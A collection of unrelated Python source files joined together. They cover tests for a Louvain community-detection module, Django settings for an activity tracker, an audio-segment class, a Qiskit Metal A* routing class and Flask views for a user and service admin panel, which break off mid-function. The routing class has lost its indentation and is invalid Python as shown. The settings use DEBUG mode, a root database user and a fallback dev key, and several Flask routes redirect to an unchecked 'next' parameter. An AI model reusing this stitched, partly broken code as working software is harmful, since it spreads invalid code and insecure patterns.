    """Unit tests for wm.WeightedPartition on the shared fixture graph.

    Expected numeric values below are tied to the tdata_corr_txt
    fixture file loaded by get_test_data().
    """

    def setUp(self):
        ## generate a default graph and communities
        graph, communities = get_test_data()
        self.graph = graph
        self.communities = communities

    def test_init(self):
        # Default construction puts each node in its own community.
        part = wm.WeightedPartition(self.graph)
        self.assertEqual(type(part.degrees), type({}))
        npt.assert_array_almost_equal(part.total_edge_weight, 1500.5653444)
        # generated communities
        comm = [set([node]) for node in self.graph.nodes()]
        self.assertEqual(part.communities, comm)
        # test communities cannot be replaced by garbage
        with self.assertRaises(TypeError):
            part.communities = 11
        # doesnt work if nodes are missing from partition
        with self.assertRaises(ValueError):
            part.communities = [set([1,2,3])]
        # but we can pass a valid community partition
        part.communities = comm
        self.assertEqual(part.communities, comm)

    def test_communities_degree(self):
        ## if no community, method will raise error
        part = wm.WeightedPartition(self.graph)
        part = wm.WeightedPartition(self.graph, self.communities)
        cdegree = part.communities_degree()
        self.assertEqual(round(cdegree[0]), 1462.0)

    def test_set_communities(self):
        part = wm.WeightedPartition(self.graph, self.communities)
        self.assertEqual(part.communities, self.communities)
        with self.assertRaises(TypeError):
            # raise error if not list of sets
            part.set_communities(part.communities[0])
        with self.assertRaises(TypeError):
            part.set_communities('a')
        with self.assertRaises(ValueError):
            ## missing nodes
            comm = self.graph.nodes()[:-3]
            part.set_communities([set(comm)])

    def test_allnodes_in_communities(self):
        """checks communities contain all nodes
        with no repetition"""
        part = wm.WeightedPartition(self.graph)
        self.assertTrue(part._allnodes_in_communities(self.communities))
        self.assertFalse(part._allnodes_in_communities([self.communities[0]]))

    def test_get_node_community(self):
        part = wm.WeightedPartition(self.graph, self.communities)
        self.assertEqual(part.get_node_community(0), 0)
        self.assertEqual(part.get_node_community(self.graph.nodes()[-1]),1)
        # A node absent from the graph raises.
        with self.assertRaises(ValueError):
            part.get_node_community(-1)
        part = wm.WeightedPartition(self.graph)
        self.assertEqual(part.get_node_community(0), 0)

    def test_node_degree(self):
        part = wm.WeightedPartition(self.graph) # one comm per node
        node = 0
        res = part.node_degree(node)
        npt.assert_almost_equal(res, 37.94151675 )

    def test_modularity(self):
        part = wm.WeightedPartition(self.graph, self.communities)
        npt.assert_almost_equal(part.modularity(), 0.0555463)

    def test_degree_by_community(self):
        part = wm.WeightedPartition(self.graph) # one comm per node
        ## summ of all links in or out of communities
        ## since one per scommunity, just weighted degree of each node
        tot_per_comm = part.degree_by_community()
        degw = self.graph.degree(weight='weight').values()
        self.assertEqual(tot_per_comm, degw)
        ## This isnt true of we have communities with multiple nodes
        part_2comm = wm.WeightedPartition(self.graph, self.communities)
        self.assertEqual(part_2comm == degw, False)

    def test_degree_within_community(self):
        part = wm.WeightedPartition(self.graph) # one comm per node
        weights = part.degree_within_community()
        ## this inlcudes self links so
        self.assertEqual(weights[0], 1.0)

    def test_node_degree_by_community(self):
        part = wm.WeightedPartition(self.graph) # one comm per node
        node = 0
        node2comm_weights = part.node_degree_by_community(node)
        # self loops not added to weight
        # so communities made only of node should be zero
        npt.assert_equal(node2comm_weights[0],0)
        # this should be equal to weight between two nodes
        neighbor = 1
        expected = self.graph[node][neighbor]['weight']
        npt.assert_equal(node2comm_weights[neighbor],expected)
        part = wm.WeightedPartition(self.graph, self.communities)
        node2comm_weights = part.node_degree_by_community(node)
        npt.assert_equal(len(node2comm_weights), 2)
class TestLouvainCommunityDetection(unittest.TestCase):
    """Unit tests for wm.LouvainCommunityDetection: node moves,
    delta-modularity bookkeeping, dendogram generation and the full run.
    """

    def setUp(self):
        ## generate a default graph and communities
        graph, communities = get_test_data()
        self.graph = graph
        self.communities = communities
        self.louvain = wm.LouvainCommunityDetection(graph)
        self.louvain_comm = wm.LouvainCommunityDetection(graph, communities)

    def test_init(self):
        louvain = self.louvain
        self.assertEqual(louvain.graph, self.graph)
        self.assertEqual(louvain.initial_communities, None)
        self.assertEqual(louvain.minthr, 0.0000001)

    def test_communities_without_node(self):
        part = wm.WeightedPartition(self.graph) # one comm per node
        node = 0
        updated_comm = self.louvain._communities_without_node(part, node)
        # Removing the only member empties its singleton community.
        self.assertEqual(updated_comm[0], set([]))
        part = wm.WeightedPartition(self.graph, self.communities)
        updated_comm = self.louvain_comm._communities_without_node(part, node)
        ## make sure we dont break communities from original partition
        self.assertEqual(part.communities, self.communities)
        self.assertEqual(0 not in updated_comm[0], True)

    def test_communities_nodes_alledgesw(self):
        part = wm.WeightedPartition(self.graph, self.communities)
        node = 0
        weights = self.louvain_comm._communities_nodes_alledgesw(part, node)
        npt.assert_almost_equal(weights[0], 1424.0220362)
        ## test with possible empty node set
        part = wm.WeightedPartition(self.graph)
        weights = self.louvain._communities_nodes_alledgesw(part, node)
        self.assertEqual(weights[0], 0)
        # other communities are made up of just one node
        self.assertEqual(weights[1], self.graph.degree(weight='weight')[1])

    def test_calc_delta_modularity(self):
        part = wm.WeightedPartition(self.graph) # one comm per node
        node = 0
        change = self.louvain._calc_delta_modularity(node, part)
        self.assertEqual(len(change), len(part.communities))
        # change is an array
        self.assertEqual(change.shape[0], len(part.communities))
        self.assertEqual(change[0] < change[1], True)
        # this is one comm per node, so once removed from own
        # comm, this delta_weight will be zero
        self.assertEqual(change[node] , 0)

    def test_move_node(self):
        part = wm.WeightedPartition(self.graph) # one comm per node
        #move first node to second community
        node = 0
        comm = 1
        newpart = self.louvain._move_node(part, node, comm)
        self.assertEqual(set([0,1]) in newpart.communities, True)
        ## what happens if node or comm missing
        with self.assertRaises(ValueError):
            newpart = self.louvain._move_node(part, -1, comm)
        invalid_communities = len(part.communities) + 1
        with self.assertRaises(IndexError):
            newpart = self.louvain._move_node(part, node, invalid_communities)

    def test_gen_dendogram(self):
        # A graph with nodes but no edges cannot be processed.
        graph = nx.Graph()
        nodeslist = [0,1,2,3,4]
        graph.add_nodes_from(nodeslist, weight=True)
        louvain = wm.LouvainCommunityDetection(graph)
        self.assertRaises(IOError, louvain._gen_dendogram)

    def test_run(self):
        # End-to-end run on the classic karate-club benchmark graph.
        karate = nx.karate_club_graph()
        louvain = wm.LouvainCommunityDetection(karate)
        final_partitions = louvain.run()
        self.assertEqual(final_partitions[-1].modularity() > .38,
                         True)
        self.assertEqual(len(final_partitions), 2)

    def test_combine(self):
        first = [set([0,1,2]), set([3,4,5]), set([6,7])]
        second = [set([0,2]), set([1])]
        npt.assert_raises(ValueError, self.louvain._combine, second, first)
        res = self.louvain._combine(first, second)
        npt.assert_equal(res, [set([0,1,2,6,7]), set([3,4,5])])
def test_meta_graph():
    """meta_graph collapses each community to a node while preserving
    total edge weight."""
    graph, communities = get_test_data()
    part = wm.WeightedPartition(graph)
    metagraph,_ = wm.meta_graph(part)
    ## each node is a comm, so no change to metagraph
    npt.assert_equal(metagraph.nodes(), graph.nodes())
    ## two communitties
    part = wm.WeightedPartition(graph, communities)
    metagraph,mapping = wm.meta_graph(part)
    npt.assert_equal(metagraph.nodes(), [0,1])
    npt.assert_equal(metagraph.edges(), [(0,0),(0,1), (1,1)])
    # mapping should map new node 0 to communities[0]
    npt.assert_equal(mapping[0], communities[0])
    ## weight should not be lost between graphs
    npt.assert_almost_equal(metagraph.size(weight='weight'),
                            graph.size(weight='weight'))
|
"""
Django settings for activitytracker project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# import dj_database_url
# from decouple import Csv, config
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# DATABASES['default'] = dj_database_url.config()
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# The previous line here was an invalid redaction placeholder, which made
# the module unimportable. Read the key from the environment instead; the
# fallback is for local development only and must be overridden in
# production.
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'insecure-dev-only-key')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
# ALLOWED_HOSTS = ['*']
ALLOWED_HOSTS = [ ]
# ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'accounts',
    'activities',
    'home',
    'Custom',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'activitytracker.urls'
WSGI_APPLICATION = 'activitytracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
#for heroku
# DEBUG = config('DEBUG', default=False, cast=bool)
# DATABASES = {
#     'default': dj_database_url.config(
#         default=config('DATABASE_URL')
#     )
# }
# Credentials come from the environment so no secret lives in the repo.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'activitytracker',
        'USER': 'root',
        'PASSWORD': os.environ.get('DB_PASSWORD', ''),
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'staticfiles'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                "django.contrib.auth.context_processors.auth",
            ]
        }
    }
]
TEMPLATE_CONTEXT_PROCESSORS = (
    'django.core.context_processors.request',
)
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
# Mail credentials also come from the environment (a Gmail app-specific
# password is required; see the Gmail security settings).
EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER', '')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD', '')
EMAIL_PORT = 587
#This did the trick
DEFAULT_FROM_EMAIL = EMAIL_HOST_USER
GITHUB_CLIENT = ''
GITHUB_TOKEN = ''
import numpy as np
import librosa
import soundfile as sf
class AudioSegment(object):
    """Monaural audio segment abstraction.
    :param samples: Audio samples [num_samples x num_channels].
    :type samples: ndarray.float32
    :param sample_rate: Audio sample rate.
    :type sample_rate: int
    :raises TypeError: If the sample data type is not float or int.
    """
    def __init__(self, samples, sample_rate, target_sr=None):
        """Create audio segment from samples.
        Samples are convert float32 internally, with int scaled to [-1, 1].
        Optionally resamples to `target_sr` and downmixes multi-channel
        input to mono by averaging channels.
        """
        samples = self._convert_samples_to_float32(samples)
        if target_sr is not None and target_sr != sample_rate:
            samples = librosa.core.resample(samples, sample_rate, target_sr)
            sample_rate = target_sr
        self._samples = samples
        self._sample_rate = sample_rate
        # Downmix to mono: average across the channel axis.
        if self._samples.ndim >= 2:
            self._samples = np.mean(self._samples, 1)

    def __eq__(self, other):
        """Return whether two objects are equal."""
        if type(other) is not type(self):
            return False
        if self._sample_rate != other._sample_rate:
            return False
        if self._samples.shape != other._samples.shape:
            return False
        if np.any(self.samples != other._samples):
            return False
        return True

    def __ne__(self, other):
        """Return whether two objects are unequal."""
        return not self.__eq__(other)

    def __str__(self):
        """Return human-readable representation of segment."""
        return ("%s: num_samples=%d, sample_rate=%d, duration=%.2fsec, "
                "rms=%.2fdB" % (type(self), self.num_samples, self.sample_rate,
                                self.duration, self.rms_db))

    @staticmethod
    def _convert_samples_to_float32(samples):
        """Convert sample type to float32.
        Audio sample type is usually integer or float-point.
        Integers will be scaled to [-1, 1] in float32.
        :raises TypeError: for non-numeric sample dtypes.
        """
        # NOTE(review): np.sctypes was removed in NumPy 2.0, so this
        # helper requires NumPy < 2 -- confirm the pinned version.
        float32_samples = samples.astype('float32')
        if samples.dtype in np.sctypes['int']:
            bits = np.iinfo(samples.dtype).bits
            # Scale by the signed-integer full-scale value.
            float32_samples *= (1. / 2**(bits - 1))
        elif samples.dtype in np.sctypes['float']:
            pass
        else:
            raise TypeError("Unsupported sample type: %s." % samples.dtype)
        return float32_samples

    @classmethod
    def from_file(cls, filename, target_sr=None, int_values=False):
        """
        Load a file supported by librosa and return as an AudioSegment.
        :param filename: path of file to load
        :param target_sr: the desired sample rate
        :param int_values: if true, load samples as 32-bit integers
        :return: numpy array of samples
        """
        samples, sample_rate = sf.read(filename)
        if int_values:
            # Scale float samples up to the 32-bit integer range.
            samples *= (1 << 31)
        # soundfile returns [frames x channels]; transpose to match the
        # [channels x frames] layout librosa's resampler expects.
        samples = samples.transpose()
        return cls(samples, sample_rate, target_sr=target_sr)

    @property
    def samples(self):
        # Return a defensive copy so callers cannot mutate internal state.
        return self._samples.copy()

    @property
    def sample_rate(self):
        return self._sample_rate

    @property
    def num_samples(self):
        return self._samples.shape[0]

    @property
    def duration(self):
        # Duration in seconds.
        return self._samples.shape[0] / float(self._sample_rate)

    @property
    def rms_db(self):
        # NOTE(review): all-zero (silent) input yields log10(0) -> -inf.
        mean_square = np.mean(self._samples**2)
        return 10 * np.log10(mean_square)

    def gain_db(self, gain):
        # In-place amplitude scaling by `gain` decibels.
        self._samples *= 10. ** (gain / 20.)

    def subsegment(self, start_time=None, end_time=None):
        """Cut the AudioSegment between given boundaries.
        Note that this is an in-place transformation.
        :param start_time: Beginning of subsegment in seconds.
        :type start_time: float
        :param end_time: End of subsegment in seconds.
        :type end_time: float
        :raise ValueError: If start_time or end_time is incorrectly set, e.g. out
        of bounds in time.
        """
        start_time = 0.0 if start_time is None else start_time
        end_time = self.duration if end_time is None else end_time
        # Negative times count back from the end of the segment.
        if start_time < 0.0:
            start_time = self.duration + start_time
        if end_time < 0.0:
            end_time = self.duration + end_time
        if start_time < 0.0:
            raise ValueError("The slice start position (%f s) is out of "
                             "bounds." % start_time)
        if end_time < 0.0:
            raise ValueError("The slice end position (%f s) is out of bounds." %
                             end_time)
        if start_time > end_time:
            raise ValueError("The slice start position (%f s) is later than "
                             "the end position (%f s)." % (start_time, end_time))
        if end_time > self.duration:
            raise ValueError("The slice end position (%f s) is out of bounds "
                             "(> %f s)" % (end_time, self.duration))
        start_sample = int(round(start_time * self._sample_rate))
        end_sample = int(round(end_time * self._sample_rate))
        self._samples = self._samples[start_sample:end_sample]
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
import heapq
import numpy as np
from qiskit_metal import Dict
from qiskit_metal.qlibrary.core import QRoutePoint
from .anchored_path import RouteAnchors
from qiskit_metal.toolbox_metal import math_and_overrides as mao
from collections import OrderedDict
from qiskit_metal.toolbox_metal.exceptions import QiskitMetalDesignError
class RoutePathfinder(RouteAnchors):
"""
Non-meandered CPW class that combines A* pathfinding algorithm with
simple 1-, 2-, or S-shaped segment checks and user-specified anchor points.
1. A* heap modified to prioritize paths with shortest length_travelled + Manhattan distance to destination.
2. Checks if connect_simple is valid each time we pop from the heap. If so, use it, otherwise proceed with A*.
3. Tweaks connect_simple to account for end anchor direction in determining which CPW (elbow or S-segment) to use.
RouteAnchors Default Options:
* anchors: OrderedDict -- Intermediate anchors only; doesn't include endpoints
* advanced: Dict
* avoid_collision: 'false' -- true/false, defines if the route needs to avoid collisions
Default Options:
* step_size: '0.25mm' -- Length of the step for the A* pathfinding algorithm
* advanced: Dict
* avoid_collision: 'true' -- true/false, defines if the route needs to avoid collisions
"""
default_options = Dict(step_size='0.25mm',
advanced=Dict(avoid_collision='true'))
"""Default options"""
TOOLTIP = """ Non-meandered CPW class that combines A* pathfinding algorithm with
simple 1-, 2-, or S-shaped segment checks and user-specified anchor points."""
def connect_astar_or_simple(self, start_pt: QRoutePoint,
end_pt: QRoutePoint) -> list:
"""Connect start and end via A* algo if connect_simple doesn't work.
Args:
start_direction (np.array): Vector indicating direction of starting point
start (np.array): 2-D coordinates of first anchor
end (np.array): 2-D coordinates of second anchor
Returns:
List of vertices of a CPW going from start to end
Raises:
QiskitMetalDesignError: If the connect_simple() has failed.
"""
start_direction = start_pt.direction
start = start_pt.position
end_direction = end_pt.direction
end = end_pt.position
step_size = self.parse_options().step_size
starting_dist = sum(
abs(end - start)) # Manhattan distance between start and end
key_starting_point = (starting_dist, start[0], start[1])
pathmapper = {key_starting_point: [starting_dist, [start]]}
# pathmapper maps tuple(total length of the path from self.start + Manhattan distance to destination, coordx, coordy) to [total length of
# path from self.start, path]
visited = set(
) # maintain record of points we've already visited to avoid self-intersections
visited.add(tuple(start))
# TODO: add to visited all of the current points in the route, to prevent self intersecting
priority_queue = list() # A* priority queue. Implemented as heap
priority_queue.append(key_starting_point)
# Elements in the heap are ordered by the following:
# 1. The total length of the path from self.start + Manhattan distance to destination
# 2. The x coordinate of the latest point
# 3. The y coordinate of the latest point
while priority_queue:
tot_dist, x, y = heapq.heappop(
priority_queue
) # tot_dist is the total length of the path from self.start + Manhattan distance to destination
length_travelled, current_path = pathmapper[(tot_dist, x, y)]
# Look in forward, left, and right directions a fixed distance away.
# If the line segment connecting the current point and this next one does
# not collide with any bounding boxes in design.components, add it to the
# list of neighbors.
neighbors = list()
if len(current_path) == 1:
# At starting point -> initial direction is start direction
direction = start_direction
else:
# Beyond starting point -> look at vector difference of last 2 points along path
direction = current_path[-1] - current_path[-2]
# The dot product between direction and the vector connecting the current
# point and a potential neighbor must be non-negative to avoid retracing.
# Check if connect_simple works at each iteration of A*
try:
simple_path = self.connect_simple(
QRoutePoint(np.array([x, y]), direction),
QRoutePoint(end, end_direction))
except QiskitMetalDesignError:
simple_path = None
# try the pathfinder algorithm
pass
if simple_path is not None:
current_path.extend(simple_path)
return current_path
for disp in [
np.array([0, 1]),
np.array([0, -1]),
np.array([1, 0]),
np.array([-1, 0])
]:
# Unit displacement in 4 cardinal directions
if mao.dot(disp, direction) >= 0:
# Ignore backward direction
curpt = current_path[-1]
nextpt = curpt + step_size * disp
if self.unobstructed([curpt, nextpt]):
neighbors.append(nextpt)
for neighbor in neighbors:
if tuple(neighbor) not in visited:
new_remaining_dist = sum(abs(end - neighbor))
new_length_travelled = length_travelled + step_size
new_path = current_path + [neighbor]
if new_remaining_dist < 10**-8:
# Destination has been reached within acceptable error tolerance (errors due to rounding in Python)
return new_path[:-1] + [
end
] # Replace last element of new_path with end since they're basically the same
heapq.heappush(priority_queue,
(new_length_travelled + new_remaining_dist,
neighbor[0], neighbor[1]))
pathmapper[(new_length_travelled + new_remaining_dist,
neighbor[0], neighbor[1])] = [
new_length_travelled, new_path
]
visited.add(tuple(neighbor))
return [
] # Shouldn't actually reach here - if it fails, there's a convergence issue
def make(self):
    """Generate the full route from the start pin to the end pin.

    Routes through every user-supplied anchor in order, using the A*
    pathfinder (with a simple-connection fallback) between successive
    waypoints, then flattens the per-segment points into one array and
    converts them into drawable elements.
    """
    opts = self.parse_options()
    anchors = opts.anchors

    # Register the pins and align the lead-in/out with the user options.
    self.set_pin("start")
    self.set_pin("end")
    self.set_lead("start")  # lead-in; the current tip is tracked internally
    end_point = self.set_lead("end")

    # One routed segment per anchor, keyed by anchor index.
    self.intermediate_pts = OrderedDict()
    for anchor_idx, anchor_coord in anchors.items():
        segment = self.connect_astar_or_simple(self.get_tip(),
                                               QRoutePoint(anchor_coord))
        if segment is None:
            # No path found; keep at least the anchor point itself.
            self.intermediate_pts[anchor_idx] = [anchor_coord]
        else:
            # Append the anchor so the route passes through it.
            self.intermediate_pts[anchor_idx] = np.concatenate(
                [segment, [anchor_coord]], axis=0)

    # Final leg: from the last reached point to the end lead.
    segment = self.connect_astar_or_simple(self.get_tip(), end_point)
    if segment is not None:
        self.intermediate_pts[len(anchors)] = np.array(segment)

    # Drop redundant points, then collapse the dict into a single array.
    self.trim_pts()
    self.intermediate_pts = np.concatenate(list(
        self.intermediate_pts.values()), axis=0)

    # Convert the accumulated points into QGeometry elements.
    self.make_elements(self.get_points())
|
from flask import Flask, session, request, flash, url_for, redirect, render_template, abort, g, jsonify, Response
from flask_login import login_user, logout_user, current_user, login_required
from webapp import db, app, login_manager, UserType, recaptcha
from .models import *
import sendgrid
import os
from sendgrid.helpers.mail import *
import bcrypt
import datetime
from tables import UsersTable, ServicesTable, HistoryTable, StatisticsTable, StatItem
from functions import generate_registration_token, confirm_token, notification_fix, send_notification
import json
from bson import json_util
from flask_recaptcha import ReCaptcha
@login_manager.user_loader
def load_user(id):
    """Flask-Login callback: resolve a session user id to a User row."""
    user_pk = int(id)
    return User.query.get(user_pk)
@app.route('/')
@app.route('/index')
@login_required
def index():
    """Landing page: authenticated users are sent straight to the dashboard."""
    return redirect(url_for('dashboard'))
@app.route('/logout')
def logout():
    """End the current session and return the user to the login page."""
    logout_user()
    return redirect(url_for('login'))
@app.before_request
def before_request():
    """Expose the logged-in user on flask.g for the duration of each request."""
    g.user = current_user
@app.route('/test_service')
def test_service():
    """Simple health-check endpoint."""
    # Swap in the line below to simulate an outage:
    # return "Internal Server Error", 500
    return "OK!", 200
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Log an admin in via the web panel.

    GET renders the login form; POST validates the credentials and only
    admits users whose organization mapping marks them as an admin.
    """
    # display login template
    if request.method == 'GET':
        return render_template('login.html', title="DevOps")
    # get input values from template
    email = request.form['email']
    password = request.form['password']
    # get user from db by email
    registered_user = User.query.filter_by(email=email).first()
    # check if user with given email exists in db
    if registered_user is None:
        flash('The user does not exist!', 'error')
        return redirect(url_for('login'))
    # checking encrypted password
    check_pass = bcrypt.checkpw(password.encode(), registered_user.password.encode())
    # BUG FIX: a user without any organization mapping used to crash with
    # AttributeError on org_usr_mapp.user_type; treat it as an invalid login.
    org_usr_mapp = User_Organization_mapping.query.filter_by(id_user=registered_user.id).first()
    if not check_pass or org_usr_mapp is None or org_usr_mapp.user_type != UserType.adm:
        flash('Email or Password is invalid', 'error')
        return redirect(url_for('login'))
    # login user
    login_user(registered_user)
    flash('Logged in successfully')
    return redirect(request.args.get('next') or url_for('dashboard'))
@app.route('/register/<token>/<organization_id>', methods=['GET', 'POST'])
def register(token, organization_id):
    """Register an invited (non-admin) user from an emailed token link.

    An existing user is simply attached to the new organization; otherwise
    GET renders the registration form and POST (with a valid captcha)
    creates the account.
    """
    pushed_token = Tokens.query.filter_by(token=token).first()
    # BUG FIX: the token row was dereferenced (date_of_expire) before the
    # existence check, crashing on unknown tokens; validate it up front,
    # for POST as well as GET.
    if pushed_token is None or pushed_token.is_used:
        return "Brak dostepu!"
    # check if token expired (tokens are valid for 7 days)
    expiration_date = pushed_token.date_of_expire + datetime.timedelta(days=7)
    if expiration_date <= datetime.datetime.now():
        return "Brak dostepu! Token wygasl!"
    email = confirm_token(token)
    # register user which already exists in db: just attach to this organization
    user = User.query.filter_by(email=email).first()
    if user is not None:
        org_usr_mapp = User_Organization_mapping(id_user=user.id, id_organization=organization_id, user_type=2)
        db.session.add(org_usr_mapp)
        pushed_token.is_used = True
        db.session.commit()
        flash('User successfully registered')
        return "You are register to other organization! Now you joined to this organization too."
    if request.method == 'GET':
        return render_template('register.html', title="DevOps", registerAdmin="false")
    if recaptcha.verify():
        name = request.form['name']
        surname = request.form['surname']
        password = request.form['password']
        password_bytes = password.encode('utf-8')
        hashed = bcrypt.hashpw(password_bytes, bcrypt.gensalt())
        # BUG FIX: the stored password is now the bcrypt hash computed above
        # (the previous code referenced an undefined placeholder name here).
        user = User(name=name, surname=surname, email=email, password=hashed)
        db.session.add(user)
        db.session.commit()
        org_usr_mapp = User_Organization_mapping(id_user=user.id, id_organization=organization_id, user_type=2)
        db.session.add(org_usr_mapp)
        pushed_token.is_used = True
        db.session.commit()
        flash('User successfully registered')
        return "Your account is ready for login. Go to your Android app and try this on!"
    else:
        return render_template("register.html", title="DevOps", registerAdmin="false", captcha="failed")
@app.route('/remove_service', methods=['GET', 'POST'])
@login_required
def remove_service():
    """Delete a service and all subscriptions to it, then show the list."""
    if request.method == 'POST':
        service_id = request.args.get('id')
        service = Service.query.filter_by(id=service_id).first()
        # Remove every subscription that points at this service first.
        for subscription in Subscription.query.filter_by(id_service=service_id).all():
            db.session.delete(subscription)
        db.session.delete(service)
        db.session.commit()
    return redirect(request.args.get('next') or url_for('services'))
@app.route('/remove_user', methods=['GET', 'POST'])
@login_required
def remove_user():
    # POST: detach a user from the admin's organization; the User row itself
    # is only deleted once it no longer belongs to any organization.
    if request.method == 'POST':
        id = request.args.get('id')
        # Admin's own mapping identifies which organization is being managed.
        org = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
        services_of_organization = Service.query.filter_by(organization_id=org.id_organization).all()
        subscriptions = Subscription.query.filter_by(id_user=id).all()
        membership_to_organization = User_Organization_mapping.query.filter_by(id_user=id, id_organization=org.id_organization).first()
        # Delete only the subscriptions to services that belong to the
        # organization the user is being removed from.
        for sub in subscriptions:
            for serv in services_of_organization:
                if sub.id_service == serv.id:
                    db.session.delete(sub)
        # Remove the user only from the admin's organization, and only if
        # that user is not an admin themselves.
        # NOTE(review): membership_to_organization can be None when the
        # target user is not in this organization — confirm callers
        # guarantee membership, otherwise this raises AttributeError.
        if membership_to_organization.user_type != UserType.adm:
            db.session.delete(membership_to_organization)
            user = User.query.filter_by(id=id).first()
            # If the user no longer belongs to any organization, delete them.
            if user.organizations == []:
                db.session.delete(user)
        db.session.commit()
    return redirect(request.args.get('next') or url_for('users'))
# Admin registration: creates the admin account and a new organization.
@app.route('/register', methods=['GET', 'POST'])
def register_admin():
    """Register a brand-new admin together with a new organization."""
    if request.method == 'GET':
        return render_template('register.html', title="DevOps", registerAdmin="true")
    if not recaptcha.verify():
        return render_template('register.html', title="DevOps", registerAdmin="true", captcha="failed")
    email = request.form['email']
    name = request.form['name']
    organization = request.form['organization']
    # Organization names must be unique; bounce back to the form otherwise.
    if Organization.query.filter_by(name=organization).first() is not None:
        return redirect(request.args.get('next') or url_for('register_admin'))
    surname = request.form['surname']
    hashed = bcrypt.hashpw(request.form['password'].encode('utf-8'), bcrypt.gensalt())
    # Create the admin (user_type=1) and its freshly named organization.
    user = User(name=name, surname=surname, email=email, password=hashed)
    org_usr_mapp = User_Organization_mapping(user_type=1)
    org_usr_mapp.organization = Organization(name=organization)
    user.organizations.append(org_usr_mapp)
    db.session.add(user)
    db.session.add(org_usr_mapp)
    db.session.commit()
    flash('User successfully registered')
    return redirect(request.args.get('next') or url_for('login'))
@app.route('/users', methods=['GET', 'POST'])
@login_required
def users():
    """Render the table of all users in the current admin's organization."""
    # Mapping row for the logged-in admin -> gives us the organization id.
    org_id = User_Organization_mapping.query.filter_by(id_user=g.user.id).first()
    if request.method == 'GET':
        members = db.session.query(User_Organization_mapping).filter_by(
            id_organization=org_id.id_organization).all()
        return render_template('users.html',
                               users_table=UsersTable(members),
                               panel="users",
                               org_name=org_id.organization.name)
@app.errorhandler(404)
def page_not_found(error):
    """Custom 404 handler.

    BUG FIX: the handler previously returned its body with an implicit
    200 status; an error handler must propagate the 404 status code.
    """
    return 'fail', 404
@app.route('/loginandroid', methods=['GET', 'POST'])
def loginandroid():
    """Log a user in from the Android app and store their FCM push token.

    Returns a JSON payload with the user's basic profile on success.
    """
    if request.method == 'GET':
        return "Brak dostepu!", 403
    email = request.form['email']
    password = request.form['password']
    fcm_token = request.form['fcm_token']
    registered_user = User.query.filter_by(email=email).first()
    if registered_user is None:
        flash('The user does not exist!', 'error')
        return "Uzytkownik nie istnieje", 403
    check_pass = bcrypt.checkpw(password.encode(), registered_user.password.encode())
    if not check_pass:
        flash('Email or Password is invalid', 'error')
        # BUG FIX: the response body here was a corrupted placeholder string.
        return "Bledny email lub haslo", 403
    login_user(registered_user)
    flash('Logged in successfully')
    # Remember the device's Firebase Cloud Messaging token for notifications.
    registered_user.fcm_token = fcm_token
    db.session.commit()
    return jsonify({
        "error": False,
        "uid": registered_user.id,
        "user": {
            "name": registered_user.name,
            "surname": registered_user.surname,
            "email": registered_user.email,
            "fcm_token": registered_user.fcm_token
        }
    }), 200
@app.route('/logoutandroid')
def logoutandroid():
    """Log the Android user out of their session."""
    logout_user()
    return "Success", 200
@app.route('/servicesandroid')
def servicesandroid():
    """Return, as JSON, every service of every organization the user belongs to."""
    if not current_user.is_authenticated():
        return "Blad", 400
    memberships = User_Organization_mapping.query.filter_by(id_user=g.user.id).all()
    items = []
    for membership in memberships:
        items.extend(Service.query.filter_by(
            organization_id=membership.id_organization).all())
    payload = json.dumps([o.dump() for o in items], default=json_util.default)
    return Response(payload, mimetype='application/json')
@app.route('/subscriptionandroid', methods=['GET', 'POST'])
def subscriptionandroid():
    """List (GET) or modify (POST) the current user's service subscriptions."""
    if not current_user.is_authenticated():
        return "Blad", 400
    if request.method == 'GET':
        subs = db.session.query(Subscription).filter_by(id_user=g.user.id).all()
